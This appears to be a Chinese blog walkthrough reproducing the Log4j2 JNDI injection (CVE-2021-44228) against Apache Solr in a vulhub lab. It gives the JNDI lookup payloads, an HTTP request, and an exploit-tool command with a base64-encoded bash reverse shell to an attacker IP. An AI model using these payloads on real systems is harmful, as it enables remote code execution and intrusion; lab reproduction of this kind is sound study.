vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`{jndi:dns://{sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

复制代码
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

复制代码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

复制代码
http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

相关推荐
B2_Proxy13 分钟前
如何搭建高速稳定安全的网络环境?住宅代理是关键
服务器·网络·安全
米羊12140 分钟前
fastjson (1概述)
网络·安全
94620164zwb51 小时前
隐私安全模块 Cordova 与 OpenHarmony 混合开发实战
安全
缘友一世2 小时前
计算机网络中的安全(8)复习
网络·计算机网络·安全
能年玲奈喝榴莲牛奶2 小时前
安全服务-应急响应测评
安全·web安全·安全服务
菩提小狗2 小时前
小迪安全_第4天:基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值|小迪安全笔记|网络安全|
前端·网络·数据库·笔记·安全·web安全
Bypass--3 小时前
防护篇 | 云原生安全攻防实战
安全·云原生·容器·kubernetes
恒拓高科WorkPlus3 小时前
当统一的数字底座成为刚需,安全、智能、开放的平台如何重塑跨部门协作?
安全
奋飞安全3 小时前
Jadx也想要翅膀
安全
white-persist3 小时前
【内网运维】Netsh 全体系 + Windows 系统专属命令行指令大全
运维·数据结构·windows·python·算法·安全·正则表达式